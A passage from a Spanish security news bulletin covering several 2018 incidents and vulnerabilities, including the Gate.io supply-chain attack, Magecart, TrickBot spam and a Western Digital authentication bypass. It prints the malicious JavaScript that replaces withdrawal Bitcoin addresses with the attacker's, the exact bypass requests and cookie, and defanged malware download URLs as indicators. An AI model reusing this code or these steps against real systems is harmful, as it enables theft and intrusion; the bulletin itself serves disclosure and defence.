Entre las diferentes plataformas de trading existentes, la URI ‘myaccount/withdraw/BTC’ sólo coincide con Gate.io, por lo que parece ser el principal objetivo de este ataque.

El payload introducido por el segundo componente ‘https://www.statconuter.com/c.php’ sustituye la dirección de Bitcoin de destino por la del atacante(1JrFLmGVk1ho1UcMPq1WYirHptcCYr2jad).

document.forms[0]['addr'].value = '';
document.forms[0]['amount'].value = '';
doSubmit1 = doSubmit;
doSubmit = function () {
    var a = document.getElementById('withdraw_form');
    if ($('#amount').val() > 10) {
        document.forms[0]['addr']['name'] = '';
        var s = $("");
        s.attr('value', '1JrFLmGVk1ho1UcMPq1WYirHptcCYr2jad');
        var b = $('#withdraw_form');
        b.append(s);
        a.submit();
    } else if (document.getElementById('canUse').innerText > 10) {
        document.forms[0]['addr']['name'] = '';
        var s = $("");
        s.attr('value', '1JrFLmGVk1ho1UcMPq1WYirHptcCYr2jad');
        var b = $('#withdraw_form');
        b.append(s);
        document.forms[0]['amount']['name'] = '';
        var t = $("");
        t.attr('value', Math.min(document.getElementById('canUse').innerText, document.getElementById('dayLimit').innerText));
        b.append(t);
        a.submit();
    } else {
        doSubmit1();
    }
};

Es difícil determinar cuántos bitcoins han sido transferidos a los atacantes, ya que se generan nuevas direcciones cada vez que se carga el script ‘https://www.statconuter.com/c.php’. A pesar de esto, desde Gate.io no tienen constancia de que ninguno de sus usuarios haya sido afectado.

Para introducir el script modificado, los atacantes no comprometieron ninguno de los servidores de StatCounter, sino que envenenaron la caché de CloudFlare para que se sirviera el código malicioso. CloudFlare ya advirtió de esta vulnerabilidad hace unos meses y desde Hispasec recomendamos seguir sus recomendaciones para evitar este tipo de ataques.

Más información:

Supply-chain attack on cryptocurrency exchange gate.io
https://www.welivesecurity.com/2018/11/06/supply-chain-attack-cryptocurrency-exchange-gate-io/

Descubiertos fallos en cifrado por hardware en los SSD más populares

Las pruebas realizadas a varios modelos SSD tanto de Samsung como de Crucial revelan que la seguridad es insuficiente e incluso nula.

Investigadores de los Países Bajos han puesto a prueba la seguridad del cifrado por hardware de varios modelos SSD, poniendo en entredicho las medidas de cifrado incluidas en los mismos. Los modelos afectados son los Crucial MX100, MX200 y MX300, los Samsung EVO 840 y 850, y los Samsung USB T3 y T5. En caso de poseer alguno de los modelos afectados, y estar utilizando el cifrado por hardware, se recomienda cambiar a cifrado vía software. Otros modelos, sobre todo de las mismas marcas, podrían estar afectados.

Muchos fabricantes recomiendan el empleo del cifrado por hardware, al considerar que son superiores a los métodos existentes en el cifrado vía software, lo que no es necesariamente cierto. En ocasiones, puede pensarse que se está utilizando un cifrado vía software y estar empleando un cifrado vía hardware; es el caso de Microsoft Bitlocker, el cual utilizará el cifrado del disco SSD si éste tuviese este modo habilitado.

Los problemas encontrados son considerados graves para la mayoría de los modelos anteriores y permiten el descifrado del disco sin necesidad de la clave del usuario. En el caso del Crucial MX300, el fallo es incluso más grave al utilizar como clave maestra un string de 32 bytes vacío. Es posible que en una futura actualización del firmware se solucionen estos fallos, pero en tal caso puede requerirse volver a cifrar el disco, dependiendo del tipo de vulnerabilidad.

Los fallos encontrados en estos modelos de SSD no suponen que el cifrado vía hardware tenga que ser necesariamente inseguro, pero sí que marcas tan populares como Samsung y Crucial no se han tomado en serio esta característica de sus productos. Para considerarse seguro, los fabricantes deben poner a prueba sus métodos de cifrado con auditorías externas y ser más transparentes acerca de su funcionamiento. En el cifrado por software, existen soluciones muy estandarizadas y probadas en la industria como pueden ser LUKS y VeraCrypt, los cuales son una alternativa fiable al cifrado vía hardware.

Más información:
Self-encrypting deception: weaknesses in the encryption of solid state drives (SSDs):
https://www.ru.nl/publish/pages/909282/draft-paper.pdf

Doh! What My Encrypted Drive Can Be Unlocked By Anyone?
https://medium.com/asecuritysite-when-bob-met-alice/doh-what-my-encrypted-drive-can-be-unlocked-by-anyone-a495f6653581

Paquetes maliciosos en el repositorio de python PyPI

Se ha descubierto un total de 12 librerías maliciosas en el repositorio de Python PyPI, subidas al repositorio, usando técnicas de ‘Typosquatting’ con del popular framework de desarrollo web Django.

PyPI (Python Package Index) es el repositorio de librerías de Python por excelencia. El repositorio permite la descarga e instalación de los paquetes necesarios para nuestros proyectos de desarrollo de forma fácil y cómoda.

La forma de instalar los paquetes que tiene PyPI es utilizando sentencia:

python pip install <nombre_de_paquete>

Donde <nombre_de_paquete> será sustituido por el paquete que queramos instalar en nuestro proyecto.

La forma en la que los atacantes alojan código malicioso en este tipo de repositorios no es comprometiendo un paquete legítimo, sino poniendo en los repositorios oficiales paquetes fraudulentos. Para realizar este tipo de ataques se utiliza (descarga) el paquete oficial como base, y partiendo desde aquí, se va añadiendo el código malicioso, y una vez terminado, se sube al repositorio oficial con nombres similares al original. A modo de ejemplo, los paquetes encontrados fueron: ‘Diango’, ‘Djago’, ‘Dajngo’, ‘Djanga’ que fueron creados para suplantar al paquete ‘Django’.

El ataque utilizado es el denominado ‘Typosquatting’ que consiste en la utilización de nombres similares, pero con algún error ortográfico al que se quiere suplantar esperando un error tipográfico por parte de los desarrolladores.

Los paquetes han sido detectados por un investigador con el seudónimo ‘Bertus’, el cual utilizó un sistema de escaneo automatizado que creó él mismo.

Actualmente los paquetes detectados han sido eliminados del repositorio PyPI.

Más información:

Encuentran 12 bibliotecas maliciosas en Python PyPI:

http://noticiasseguridad.com/tecnologia/encuentran-12-bibliotecas-maliciosas-en-python-pypi/

Vulnerabilidad en la gestión de paquetes ICMP en el kernel de XNU de Apple

El investigador de seguridad Kevin Backhouse ha descubierto una vulnerabilidad en el núcleo de XNU de Apple relacionada con la gestión de los paquetes ICMP.

La vulnerabilidad se produce cuando el kernel XNU recibe un paquete ICMP especialmente diseñado. De forma que, cualquier dispositivo que se encuentre en la misma red, solamente debe enviar este paquete para explotar la vulnerabilidad. Y, como se puede apreciar en el vídeo de la prueba de concepto, no requiere ningún tipo de interacción por parte de la víctima.

Video of my PoC for CVE-2018-4407. It crashes any macOS High Sierra or iOS 11 device that is on the same WiFi network. No user interaction required. pic.twitter.com/tXtp7QRCp8

— Kevin Backhouse (@kevin_backhouse) October 30, 2018

Más especificamente, la vulnerabilidad se trata de un desbordamiento de del buffer en el heap, que se produce porque el atacante controla el tamaño y contenido del buffer utilizando diferentes campos del paquete. Por ello, aunque de momento solamente se ha realizado una prueba de concepto que hace que el dispositivo se reinicie debido al fallo, debería poderse aprovechar esta vulnerabilidad para lograr la ejecución de código remoto.

Teniendo en cuenta que XNU es el kernel utilizado en los sistemas operativos de los dispositivos Apple, esta vulnerabilidad afecta tanto a iOS como a macOS. Las siguientes versiones de los sistemas operativos son vulnerables:

– iOS 11 e inferiores
– macOS High Sierra 10.13.6 e inferiores
– macOS Sierra 10.12.6 e inferiores
– Mac OSX El Capitan e inferiores

Desde Hispasec, recomendamos actualizar el dispositivo con la máxima celeridad posible.

Más Información:
Entrada de blog Kevin Backhouse:
https://lgtm.com/blog/apple_xnu_icmp_error_CVE-2018-4407

Prueba de concepto:
https://twitter.com/kevin_backhouse/status/1057352656560287746

Actualizaciones para múltiples productos de Apple

Apple ha publicado 7 boletines de seguridad que solucionan vulnerabilidades en los productos Safari, iCloud para Windows, iTunes, watchOS, iOS, tvOS y macOS. Entre todos los productos se corrigen 177 fallos de seguridad.

Los boletines publicados con las actualizaciones y problemas solucionados se resumen a continuación.

El boletín para el sistema operativo para dispositivos móviles de Apple (iPad, iPhone, iPod, etc.), iOS 12.1, resuelve 31 vulnerabilidades relacionadas con múltiples componentes, entre los que se incluyen ‘Wi-Fi’, ‘FaceTime’, el kernel y ‘WebKit’ entre otros. Uno de los fallos permitiría a una web maliciosa suplantar la URL mostrada para hacer creer a los usuarios que se encuentran en un sitio web legítimo (CVE-2018-4385).

macOS Mojave 10.14.1 y los ‘Security Update 2018-001 High Sierra’ y ‘2018-005 Sierra’. En este caso se solucionan 71 vulnerabilidades que afectan a múltiples componentes, que entre otros incluyen a ‘afpserver’, ‘AppleGraphicsControl’, ‘APR’, ‘CFNetwork’, ‘CoreCrypto’, ‘Dock’ y el kernel entre otros. Nueve de estas vulnerabilidades permitirían ejecutar código arbitrario con privilegios de sistema (CVE-2018-4126, CVE-2018-4331, CVE-2018-4334, CVE-2018-4350, CVE-2018-4393, CVE-2018-4402, CVE-2018-4410, CVE-2018-4415, CVE-2018-4426).

Safari 12.0.1 cuenta con otro boletín que soluciona 12 vulnerabilidades debidas, en su mayoría, a problemas en ‘WebKit’, el motor de código abierto que es la base de este navegador. Varios de los errores corregidos permitirían a una web maliciosa la ejecución de código arbitrario (CVE-2018-4372, CVE-2018-4373, CVE-2018-4375, CVE-2018-4376, CVE-2018-4382, CVE-2018-4386, CVE-2018-4392, CVE-2018-4416).

El boletín para el sistema operativo de los relojes inteligentes de Apple, watchOS 5.1, soluciona 21 vulnerabilidades entre las que también se encuentran algunas que podrían permitir la ejecución de código arbitrario (CVE-2018-4372, CVE-2018-4373, CVE-2018-4375, CVE-2018-4376, CVE-2018-4382, CVE-2018-4386, CVE-2018-4392, CVE-2018-4416, CVE-2018-4378).

tvOS, el sistema operativo de los televisores de la marca, se actualiza a la versión 12.1, donde se corrigen 15 vulnerabilidades en múltiples componentes. Cinco de ellas podrían permitir la ejecución remota de código (CVE-2018-4372, CVE-2018-4382, CVE-2018-4386, CVE-2018-4392, CVE-2018-4416).

Las versiones iTunes 12.9.1 e iCould 7.8 para Windows corrigen 14 y 13 vulnerabilidades respectivamente, algunas también de gravedad alta.
Todas estas versiones que corrigen los problemas de seguridad publicados en los boletines se encuentran disponibles en la página oficial de Apple, así como a través de los canales habituales de actualización.

Más información:

Safari 12.0.1
https://support.apple.com/es-es/HT209196

iCloud for Windows 7.8
https://support.apple.com/kb/HT209198

iTunes 12.9.1
https://support.apple.com/kb/HT209197

watchOS 5.1
https://support.apple.com/kb/HT209195

iOS 12.1
https://support.apple.com/kb/HT209192

tvOS 12.1
https://support.apple.com/kb/HT209194

macOS Mojave 10.14.1, Security Update 2018-001 High Sierra, Security Update 2018-005 Sierra
https://support.apple.com/kb/HT209193

Vulnerabilidad en Facebook permite el acceso a 50 millones de datos de usuarios

Una vulnerabilidad en Facebook hizo saltar la alarma el pasado día 25, cuando el equipo de ingenieros de seguridad de Facebook se percató de que existía una brecha de seguridad que afectaba a al menos 50 millones de usuarios.

El ataque se aprovechó de varias vulnerabilidades existentes en el código. La primera de ellas fue debida a un cambio que se aplicó en 2017 que afectaba a la función de la carga de vídeo. El segundo error del que se aprovechó el ataque fue en la característica ‘ver como’ de la plataforma, que te permite ver tu propio perfil como lo vería otro usuario de la red social. Esta última característica, permitió a los atacantes obtener los token de acceso de los demás usuarios.

Los token es el equivalente a las credenciales de acceso, generalmente utilizado en las APIs del servicio, bien sea para la integración de automatismos, módulos, plugins, etc… En este caso la combinación de los tres fallos permitieron a los atacantes pivotar desde sus tokens a tokens de otros usuarios permitiéndoles obtener tokens de acceso adicionales.

Aunque la investigación aún no ha concluido y está en una fase temprana, el equipo de seguridad de Facebook sigue investigando el incidente para intentar averiguar quién está detrás de este ataque, desde dónde se realizó, si hay más usuarios afectados y a qué información se accedió.

Con respecto a la información accesible del ataque, el equipo de seguridad de Facebook aseguran que solo se ha podido acceder a los datos que permite ver la característica ‘ver como’ de la red, como nombre, género, fotos, estudios, etc y que en ningún caso se ha accedido a contraseñas o datos bancarios.

Este ataque ha llevado al equipo de seguridad de Facebook a realizar tres acciones:
1 – Corregir la vulnerabilidad.
2 – Resetear los token de acceso de los 50 millones de usuarios que han sido afectados junto con otros 40 millones de usuarios que utilizaron la característica ‘ver como’ en el último año. Por lo que los usuarios que utilicen este token de acceso, tendrán que volver a iniciar la sesión en el servicio.
3 – Deshabilitar la característica ‘ver como’.

Esta situación se suma al complejo año que lleva Facebook, que comenzó con el ‘Leak de Cambridge Analytica’, continuó con la salida de los socios de Instagram, las declaraciones de los fundadores de Whatsapp, y ahora sufre otro grave fallo de seguridad que ha dejado los datos de sus usuarios accesibles.

Más información:

Comunicado de Facebook:
https://newsroom.fb.com/news/2018/09/security-update/

Imagen extraída de: https://newsroom.fb.com/

Salto de autenticación con permisos administrador en Western Digital My Cloud

La vulnerabilidad, que en estos momentos no cuenta con una solución, permite ejecutar acciones como administrador simplemente estableciendo una cookie

Tanto los investigadores de exploitee.rs como de Securify han encontrado un fallo (CVE-2018-17153) en Western Digital My Cloud que permitiría realizar acciones como administrador en uno de los dispositivos afectados. Se desconocen los modelos exactos vulnerables, pero seguramente sea un gran número de ellos al compartir código. Los investigadores realizaron sus pruebas en el modelo WDBCTL0020HWT ejecutando la versión 2.30.172.

La vulnerabilidad es muy fácil de explotar, y no tiene más requerimientos que tener conexión con el dispositivo. Para su explotación, sólo se requieren 2 pasos: primero, realizar una petición POST form a ‘/cgi-bin/network_mgr.cgi’incluyendo ‘cmd=cgi_get_ipv6&flag=1‘, creando así la sesión. Segundo, realizar una petición con un comando que requiera autenticación (por ejemplo, ‘cgi_get_ssh_pw_status‘) agregando la cookie ‘username=admin‘.

Los discos duros Western Digital My Cloud son empleados en el mercado doméstico y  PYMES para almacenar backups e información personal, por lo que son objetivo de ransomware (además de botnets) al estar conectados de forma continua a la red. La empresa fue informada en abril de 2017, pero ésta ha ignorado el reporte, por lo que se ha publicado ahora en septiembre de 2018.

En caso de contar con un dispositivo vulnerable, la primera medida a adoptar es impedir el acceso al dispositivo desde Internet (lo cual debería realizarse en cualquier caso), aunque la solución ideal es desconectar el disco duro de la red, y acceder únicamente a través de cable USB, al menos hasta que se solucione la vulnerabilidad.

Más información:

 

CVE-2018-17153:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-17153Authentication bypass vulnerability in Western Digital My Cloud allows escalation to admin privileges:
https://www.securify.nl/advisory/SFY20180102/authentication-bypass-vulnerability-in-western-digital-my-cloud-allows-escalation-to-admin-privileges.html

La Organización de las Naciones Unidas deja expuestas por accidente contraseñas y documentos confidenciales

Una mala configuración de algunos servicios para gestión de proyectos como Trello, Jira y Google Docs ha dejado expuestos documentos internos, contraseñas y otra información confidencial sobre la organización y sus miembros.

Cualquiera con el enlace adecuado podría acceder a la información, que incluía las contraseñas de uno de los servidores de ficheros de la organización, las credenciales de un sistemas de video conferencia y de un servidor de desarrollo de una de las oficinas de Coordinación de Asuntos Humanitarios.

El investigador de seguridad Kushagra Pathak que ha descubierto el «leak» ha notificado sus hallazgos a la organización, que a lo largo de este mes ha ido eliminando todo el material.

Pathak descubrió muchos de estos recursos haciendo simples búsquedas en Google, que dieron como resultado tableros de Trello públicos que contenían a su vez otros enlaces a documentos de Google Docs y páginas de Jira.

A pesar de que los tableros de Trello y los documentos de Google son privados por defecto, Pathak ha sugerido a Trello añadir medidas adicionales para evitar que los usuarios publiquen sus tableros por error. A lo que el CEO de Trello ha respondido:

«Nos esforzamos por asegurarnos de que los tableros públicos se crean de manera intencionada, haciendo necesaria una confirmación previa del usuario y mostrando en la parte superior de los tableros la visibilidad del mismo».

Los descubrimientos de Pathak ponen de manifiesto la falta de concienciación en materia de seguridad informática y los riesgos que una fuga de información de estas características supondría para grandes empresas y organizaciones.

UNITED NATIONS ACCIDENTALLY EXPOSED PASSWORDS AND SENSITIVE INFORMATION TO THE WHOLE INTERNET:

https://theintercept.com/2018/09/24/united-nations-trello-jira-google-docs-passwords/

Error de la API de Twitter expone mensajes privados de los usuarios

Un error en la API de Twitter expuso los mensajes directos de algunos usuarios a desarrolladores de aplicaciones de terceros no autorizados.

El error que ha dado pie a esta desprivatización de mensajes (si se puede llamar así) ha estado presente desde mayo de 2017 hasta el 10 de septiembre que se descubrió y parcheó.

«Si interactuaba con una cuenta o empresa en Twitter que dependía de un desarrollador que utilizaba la AAAPI para proporcionar sus servicios, es posible que el error haya provocado que algunas de estas interaccione se envíen involuntariamente a otro desarrollador registrado», explica Twitter.

Como funciona el error:

La compañía no ha querido dar muchos datos al respecto, pero si ha aclarado que el error se encontraba en el funcionamiento de la AAAPI propia de la compañía.

«En algunos casos, el error puede haber incluido el envío de ciertos mensajes directos o tweets protegidos a desarrolladores no autorizados», advierten publicamente.

Cabe señalar que el error solo involucra los DM de los usuarios y las interacciones con las empresas que utilizan Twitter para servicios como atención al cliente.

¿Cuantos usuarios están afectados?

A pesar de que no han descubierto ninguna evidencia de que un desarrollador equivocado haya recibido mensajes privados o tweets protegidos, la compañía no puede confirmar que no haya sucedido. Por lo que, potencialmente pueden estar afectadas más de 3 millones de personas (menos del 1% de los usuarios de la red social).

¿Qué puedes hacer si eres uno de los afectados con los que Twitter ha contactado?

 

Esperar. Twitter asegura que ya han contactado con todos los desarrolladores que podrían haber recibidos datos «no deseados» para que, de ser así, los eliminen con la mayor brevedad.


Esto no es más que una demostración más de que la seguridad no es una ciencia exacta y que nunca podemos asegurar estar 100% libre de peligro en Internet, por lo que debemos minimizar el riesgo al mínimo posible.

Más información:

 

Tweet de la compañía al respecto:

https://twitter.com/TwitterSupport/status/1043214606930309121

Ejecución de código remoto en Moodle

Se ha publicado un error en la plataforma educativa Moodle que podría permitir la ejecución remota de código

Moodle es una popular plataforma educativa de código abierto que permite a los educadores crear y gestionar tanto usuarios como cursos de modalidad e-learning. Además proporciona herramientas para la comunicación entre formadores y alumnos.

Existe un error al importar un cuestionario de tipo ‘arrastrar y soltar en el texto’ (ddwtos) en formato XML, debido a una falta de comprobación en una función ‘unserialize’. Esto podría causar una inyección de objetos PHP y conducir a una ejecución remota de código arbitrario.

Es necesario disponer de permisos para crear un cuestionario o importar preguntas para poder aprovechar esta vulnerabilidad. Aunque estos permisos los tienen los profesores, cabe destacar que es posible asignar el rol de ‘profesor’ un usuario ‘estudiante’ para un determinado curso, con lo cual estaría en posición de explotar este error.

Además, una plataforma Moodle también podría verse afectada de manera no intencionada si se importan cuestionarios o preguntas desde fuentes que no son de confianza.

Se propone la siguiente prueba de concepto que ejecuta el comando ‘whoami’ como demostración de la vulnerabilidad.

Prueba de concepto

Esta vulnerabilidad, identificada como CVE-2018-14630, ha sido descubierta por Johannes Moritz. Ha sido catalogada como seria por la propia plataforma y afecta a todas las versiones anteriores a las siguientes: 3.1.14, 3.3.8, 3.4.5, y 3.5.2, en las cuales se ha corregido.

Más información:

 

MSA-18-0017: Moodle XML import of ddwtos could lead to intentional remote code execution:

https://moodle.org/mod/forum/discuss.php?d=376023

Remote code execution via PHP unserialize in Moodle (CVE-2018-14630):

https://www.sec-consult.com/en/blog/advisories/remote-code-execution-php-unserialize-moodle-open-source-learning-platform-cve-2018-14630/

Moodle downloads:

https://download.moodle.org/

Newegg es la nueva víctima del grupo delictivo Magecart

Esta semana la empresa Voletix junto a RiskIQ han publicado una investigación que tiene como protagonistas al grupo de ciberdelincuentes Magecart. Esta vez la víctima ha sido la empresa minorista de ordenadores y productos electrónicos de consumo Newegg.

Magecart es un grupo de ciberdelicuentes especializado en el robo de credenciales de pago mediante el uso de “skimmers digitales”. Entre los ataques que se le han atribuido están el robo de credenciales de pago en Ticketmaster, British Airways y el caso reciente de Newegg.

Este ataque ha sido prácticamente igual que el publicado un par de semanas atrás y que afectaba a la aerolínea británica British Airways. De hecho, teniendo en cuenta la fecha de realización del ataque y no la de publicación, este ataque ha sido anterior.

En resumen, el proceso es el siguiente:

1. Los atacantes logran acceder al servidor donde se hospeda el código que interpreta la web de la víctima, a través de cualquier vector.
2. El atacante introduce un código Javascript fraudulento que, paralelamente al proceso de compra, envía los credenciales del usuario a un servidor controlado por los atacantes.
3. El ataque persiste mientras el código no es detectado.

La detección puede llevarse a cabo bien por alguien externo, por la propia empresa afectada o bien por parte de las entidades bancarias. Estas últimas, debido a las denuncias de sus clientes que reclaman cargos no autorizados, alertan a la víctima.

Las entidades bancarias están más que acostumbradas a detectar patrones que identifiquen un ‘skimmer’ como foco del robo de información de credenciales bancarios. La cadena de hechos es sencilla: reciben quejas de sus usuarios por cargos no autorizados, buscan un patrón común entre ellos, y ya tienen la fuente, en este caso todos compraron previamente en Newegg.

Durante muchos años ha sido bastante común, y lo sigue siendo, la colocación de TPVsfraudulentos que roban las tarjetas que transaccionan con él. Estas nuevas técnicas solo tienen una diferencia: no existe ningún elemento hardware, en vez de ir a un TPV físico, los atacantes manipulan TPVs virtuales.

Pero volviendo al ataque, veamos que particularidades ha tenido este caso.

Lo primero que vamos a contar es el punto donde se ha introducido el código fraudulento, en este caso ha sido en el servidor secure.newegg.com.

Lo verdaderamente sorprendente esta vez ha sido como los atacantes han intentado disfrazar el ataque para permanecer el mayor tiempo en la sombra. Para ello el 13 de agosto los atacantes registraron el dominio neweggstats.com, un dominio que pretendía disfrazar las conexiones para parecer ser legítimo y al cuál enviaban la información robada. Además le compraron un certificado SSL para cifrar el tráfico y darle aún mayor sobriedad a la infraestructura fraudulenta.

Todo esto les permitió permanecer más de un mes sin levantar sospechas, con el siguiente código cargado en la url https://secure.newegg.com/GlobalShopping/CheckoutStep2.aspx

Cabe mencionar que en el caso de British Airways se usó el eslogan, con claros tintes ‘clikbaits’, de que tan solo 22 líneas de código habían sido necesarias para llevar a cabo el ataque. Este caso de Newegg es aún más ‘flagrante’ ya han sido únicamente 15 las líneas necesarias para el llevar a cabo el ataque. Así que podíamos apostar por un eslogan bastante más divertido, a mi manera de ver, que podría ser el siguiente: “Los Hackers que forman parten de Newegg han necesitado 7 lineas menos para perpetrar su ataque que en el caso de British Airways”, una tontuna enorme, ya no solo por el hecho de que el código es Javascript y hablamos de líneas, no de sentencias, sino, porque reducir este tipo de ataques a la orden que hace el envío de datos es evidenciar un completo desconocimiento sobre todo lo que conlleva ataques de este calado.

Más información:

 

Reporte de Volexity:
https://www.volexity.com/blog/2018/09/19/magecart-strikes-again-neweggReporte de RiskIQ:
https://www.riskiq.com/blog/labs/magecart-newegg/Unaaldía Ticketmaster:
https://unaaldia.hispasec.com/2018/06/ticketmaster-un-drama-en-tres-actos-y.html

Unaaldía British Airways:
https://unaaldia.hispasec.com/2018/09/magecart-detras-de-la-sustraccion-de.html

Falso email de Deloitte usado para distribuir malware

No es la primera vez que los spammers utilizan la imagen de empresas conocidas para hacer llegar a los usuarios correos no deseados o, en el peor de los casos, malware.

En este caso los atacantes han suplantado la identidad de la conocida empresa Deloitte para distribuir muestras de TrickBot, una familia de troyanos bancarios que ha estado bastante activa los últimos meses.

Los correos reportados provienen de un tal «Adam Bush» Adam.Bush@deloitte-inv.com y utilizan un dominio fraudulento que incluye el nombre de la marca. El asunto del correo habla de un calendario de nóminas de la empresa y pretende despertar la curiosidad de la víctima para descargar y abrir el adjunto incluido.

Correo suplantando la identidad de Deloitte. Fuente: myonlinesecurity.co.uk

El fichero adjunto, en formato Excel, contiene una macro maliciosa que descargará el troyano. Desde las versiones de Office 2010 en adelante, el programa requiere que el usuario habilite de forma manual la ejecución de macros, por eso se mostrará en la hoja de cálculo un mensaje como el que vemos a continuación incitando al usuario a activar esta característica:

Payrollschedule.xls. Fuente: myonlinesecurity.co.uk

La macro descargará el ejecutable desde http://bcgfl[.]com/sdn.uqw o alternativamente http://ubeinc[.]com/sdn.uqw. Dos muestras del ya conocido Trickbot.

IOC de la campaña:

Payrollschedule.xls
MD5:  a628323455d1f19d1115e1626d1fabce
SHA-1:  552f531d1f8cba28da5fcc376abbc5647f438c69

URL de descarga del troyano:
http://bcgfl[.]com/sdn.uqw
72.29.67.154
http://ubeinc[.]com/sdn.uqw
72.29.90.19
MD5: cae0a5bb259d11b80e448c0c68f47f06
SHA1: 7c08e6f55738c52b7869d66a301578667b972f4b

Remitente: Adam.Bush@deloitte-inv[.]com
5.79.90.23
185.212.130.89
5.79.76.209
95.211.169.218

Dejar claro que Deloitte no ha sido en ningún momento comprometida y que el dominio fraudulento deloitte-inv.com ha sido registrado por un tercero que nada tiene que ver con la empresa.

Desde Hispasec recomendamos no abrir nunca correos con adjuntos no solicitados.

Más información:

 

fake Deloitte FW: Payroll schedule delivers Trickbot:

https://myonlinesecurity.co.uk/fake-deloitte-fw-payroll-schedule-delivers-trickbot/

Vulnerabilidades en plataforma de alquiler de bicicletas oBike

Se han descubierto varias vulnerabilidades en el sistema de bloqueo que utiliza la plataforma de alquiler de bicicletas oBike. Un atacante remoto podría eludir el mecanismo de bloqueo mediante ataques de repetición para reproducir textos cifrados en función de valores predecibles.

oBike es una plataforma de alquiler de bicicletas sin estaciones (se pueden recoger y entregar en cualquier ubicación donde esté permitido aparcar bicicletas o vehículos) originaria de Singapur, opera en más de 40 ciudades de Europa, Asia y Oceanía.

Desde la aplicación para smartphones, el cliente reserva una bicicleta que se encuentre ubicada cerca de su zona y mediante el escaneo de un código QR puede desbloquear y comenzar a utilizar la bicicleta gracias a un dispositivo IoT integrado en ella que actúa como sistema de bloqueo. En el momento en que la bicicleta es desbloqueada comienza el periodo de alquiler por el cual se facturará en tramos de 30 minutos.

Concretamente el protocolo de comunicación utilizado por oBike es el siguiente:

Protocolo de comunicación de la plataforma oBike

La app envía un mensaje de saludo [1] con las coordenadas GPS para desbloquear la bicicleta a través de Bluetooth (BLE o ‘Bluetooth Low Energy’) y recibe una cadena de 32 bits utilizada como desafío (‘keySource’) [2]. Esta cadena se envía a los servidores de oBike [3] donde se procesa y se devuelve a la app [4] un índice de clave ‘encKey’ y un texto cifrado de 128 bits en ‘keys’. Nuevamente a través de BLE, la app envía a la bicicleta el texto cifrado truncado a 96 bits y el índice de clave ‘encKey’ [5] y la bicicleta es desbloqueada emitiéndose una respuesta de confirmación [6] con los valores ‘macKey’ e ‘index’. Como último paso, la aplicación envía a los servidores de oBike estos dos valores en el mensaje ‘lockMessage’ [7] con el cual el alquiler de la bici queda registrado y se inicia el periodo de facturación.

Previamente, al analizar este protocolo, se descubrieron algunas vulnerabilidades que se exponen en el proyecto ‘Exploration of Weakness in Bike Sharing System’realizado por estudiantes de la ‘School of Computing (National University of Singapure)’en 2017-2018. Estas podrían permitir falsear la ubicación de las bicicletas, realizar una denegación de servicio al hacer que el servidor establezca que la bicicleta está defectuosa por lo que dejaría de aceptar intentos de desbloqueo, e incluso omitir la confirmación en el paso 7, con lo cual la bicicleta quedaría desbloqueada pero el alquiler no sería registrado y por tanto el cobro tampoco sería efectuado.

Un análisis más reciente realizado por Antoine Neuenschwander ha determinado que:

• El campo ‘keySource’ (usado en el paso [2]) no es un valor aleatorio generados por el dispositivo IoT de bloqueo sino que representa la cantidad de milisegundos desde que se encendió el chip (lo cual corresponde a una ventana temporal de algo menos de 50 días: 2^32 milisegundos).
• El texto cifrado de 128 bits ‘keys’, resultante de una operación criptográfica desconocida basada en los valores ‘keySource’ y ‘encKey’, probablemente utilice un cifrado AES-128.
• ‘encKey’ selecciona la clave de encriptación de un conjunto de 64 índices distintos determinados por el servidor.

También se ha observado que si se fijan los valores ‘keySource’ y ‘encKey’, el valor resultante de ‘keys’ es siempre igual. Esto permitiría realizar ataques de repetición para desbloquear la bicicleta, enumerando todos los valores posibles de ‘keySource’ y capturando los valores correspondientes ‘keys’ y ‘encKey’ siendo posible reproducir estos valores posteriormente y de forma offline, sin necesidad de conectar con el servidor. Además es posible limitar el número de valores a enumerar gracias a un comando BLE que provoca un reinicio del chip, con lo que el ataque se simplifica en gran medida.

Esta vulnerabilidad tiene asignado el identificador CVE-2018-16242.

Más información:

 

obike:

https://www.o.bike

CVE-2018-16242:

https://nvd.nist.gov/vuln/detail/CVE-2018-16242

Exploration of Weaknesses in Bike Sharing System:

http://isteps.comp.nus.edu.sg/event/11th-steps/module/CS3235/project/3

Reverse engineering of the oBike protocol communication (BLE and HTTP):

https://github.com/antoinet/obike

Múltiples vulnerabilidades corregidas en Apple iOS 12

Apple ha sacado un boletín de seguridad corrigiendo múltiples fallos de iOS 12, el sistema operativo de iPhone, entre ellos alguno que permite ejecutar código arbitrario

Revelación de información, elevación de privilegios, falsificación de contenido… Éstas son algunos de los impactos asociados a las vulnerabilidades que se abordan en el último boletín de Apple para su sistema operativo iOS en su versión 12. Además de usarse en el archiconocido iPhone, también está presente en la mayoría de los dispositivos móviles de la marca como el iPad o el iPod touch. Esta vez, todas las vulnerabilidades reportadas tienen un identificador CVE asociado. A continuación, repasamos las vulnerabilidades contenidas en el boletín:

• CVE-2018-4322
  • Módulo: Accounts
  • Impacto: Una aplicación puede obtener un identificador persistente de una cuenta
  • Solución: Mejora del sistema de permisos

• CVE-2018-5383
  • Módulo: Bluetooth
  • Impacto: Un atacante en una posición privilegiada de la red puede interceptar tráfico
  • Solución: Mejora de validación de entradas

• CVE-2018-4330
  • Módulo: Core Bluetooth
  • Impacto: Una aplicación puede ejecutar código arbitrario con privilegios del sistema
  • Solución: Mejora del manejo de memoria para evitar su corrupción

• CVE-2018-4356
  • Módulo: CoreMedia
  • Impacto: Una aplicación puede obtener información sobre lo que ve la cámara antes de tener concedido el acceso a ella
  • Solución: Mejora de validación de permisos

• CVE-2018-4335
  • Módulo: IOMobileFrameBuffer
  • Impacto: Una aplicación puede leer memoria restringida
  • Solución: Mejora del saneamiento de entradas

• CVE-2018-4305
  • Módulo: iTunes Store
  • Impacto: Un atacante en una posición privilegiada de la red puede falsear diálogos que piden contraseñas
  • Solución: Mejora de validación de entradas

• CVE-2018-4363
  • Módulo: Kernel
  • Impacto: Una aplicación puede leer memoria restringida
  • Solución: Mejora del validación de entradas en el kernel

• CVE-2018-4313
  • Módulo: Messages
  • Impacto: Un usuario local puede descubrir mensajes borrados de un usuario
  • Solución: Mejora en el borrado de mensajes

• CVE-2018-4352
  • Módulo: Notes
  • Impacto: Un usuario local puede descubrir notas borradas de un usuario
  • Solución: Mejora en el borrado de notas

• CVE-2018-4313
  • Módulo: Safari
  • Impacto: Un usuario local puede descubrir páginas web de un usuario
  • Solución: Mejora en el manejo de snapshots de aplicaciones

• CVE-2018-4329
  • Módulo: Safari
